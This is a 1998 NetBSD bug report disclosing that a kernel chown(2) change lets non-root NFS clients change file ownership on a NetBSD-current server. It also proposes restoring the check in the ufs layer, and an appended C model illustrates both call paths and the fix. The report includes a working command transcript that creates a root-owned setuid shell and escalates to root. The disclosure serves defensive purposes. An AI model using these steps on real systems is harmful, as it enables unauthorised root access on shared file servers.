Subject: kern/5106: recent chown(2) change introduces security hazard
To: None <, jaw@Op.Net>
From: Jeff Weisberg <jaw@Op.Net>
List: netbsd-bugs
Date: 03/03/1998 11:19:51
>Number:         5106
>Category:       kern
>Synopsis:       recent chown(2) change dangerous in heterogeneous NFS environment
>Confidential:   yes
>Severity:       critical
>Priority:       high
>Responsible:    kern-bug-people (Kernel Bug People)
>State:          open
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Tue Mar  3 08:20:00 1998
>Release:        current - 1998/02
System: NetBSD 1.3C NetBSD 1.3C (PISARRO) #57: Wed Feb 18 09:41:24 EST 1998 sparc


the test as to whether we should actually change the owner of a file
was recently moved from "ufs_vnops.c/ufs_chown()" to

consider the case of mounting a filesystem from a NetBSD-current based
box to a system not NetBSD-current based (either NetBSD-older, or any
non-NetBSD system):

I can now, as a non-privileged user on the 2nd system, chown(2) a
file mounted from the NetBSD-current box successfully, as we now
take the following path through kernel-land:

	chown() -> sys_chown() -> change_owner() -> nfs_setattr() ---->
to the current box:
	nfsrv_setattr() -> ufs_setattr() -> ufs_chown()

the "don't let non-root people chown things" test is avoided completely.

this can be exploited to gain root privs.


older % cd /dir-mounted-from-netbsd-current
older % cp /bin/sh .
older % chmod u+s sh
older % chown root:wheel sh
older % ls -lg sh
-rwsrwxr-x  1 root     wheel        6113 Mar  1 10:13 sh
older % ./sh
older #

[note: chown(8) does not permit users to run it, a simple C or Perl
prog replacement will suffice]


place the test back in the ufs layer. security-holics would likely suggest
(and I'd agree with them) that the test should be done in *both* places.
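As an added illustration (constructed model, not NetBSD kernel code), the two call paths from the report with the ownership test modelled as a function: the local path runs it in change_owner(), the NFS server path reaches ufs_chown() directly, so only a test in the ufs layer (check_in_ufs) stops the non-root chown to root. Struct and function names are assumptions made for the model.

```c
#include <errno.h>
#include <stdbool.h>
#include <sys/types.h>
/* Constructed model of the two call paths in the report; not NetBSD code. */
struct cred { uid_t uid; const gid_t *groups; int ngroups; };
struct inode { uid_t uid; gid_t gid; mode_t mode; };

static bool groupmember(gid_t g, const struct cred *c)
{
    for (int i = 0; i < c->ngroups; i++)
        if (c->groups[i] == g) return true;
    return false;
}

/* The "don't let non-root people chown things" test: only root may change
 * the owner; the owner may change the group only to one they belong to. */
int chown_permitted(const struct cred *c, const struct inode *ip,
                    uid_t uid, gid_t gid)
{
    if (c->uid == 0) return 0;
    if (c->uid != ip->uid || uid != ip->uid ||
        (gid != ip->gid && !groupmember(gid, c))) return EPERM;
    return 0;
}

/* ufs layer: with check_in_ufs the test runs here too (the proposed fix).
 * ip->mode is left untouched, as the setuid bit was in the transcript. */
int ufs_chown(const struct cred *c, struct inode *ip, uid_t uid, gid_t gid,
              bool check_in_ufs)
{
    int error;
    if (check_in_ufs && (error = chown_permitted(c, ip, uid, gid)) != 0)
        return error;
    ip->uid = uid; ip->gid = gid;
    return 0;
}

/* Local path: sys_chown() -> change_owner() runs the test, then ufs_chown(). */
int local_chown(const struct cred *c, struct inode *ip, uid_t uid, gid_t gid,
                bool check_in_ufs)
{
    int error = chown_permitted(c, ip, uid, gid);
    return error ? error : ufs_chown(c, ip, uid, gid, check_in_ufs);
}

/* NFS server path: nfsrv_setattr() -> ufs_setattr() -> ufs_chown(), with no
 * change_owner() in between, so only the ufs-layer test can refuse it. */
int nfs_server_chown(const struct cred *c, struct inode *ip, uid_t uid,
                     gid_t gid, bool check_in_ufs)
{
    return ufs_chown(c, ip, uid, gid, check_in_ufs);
}
```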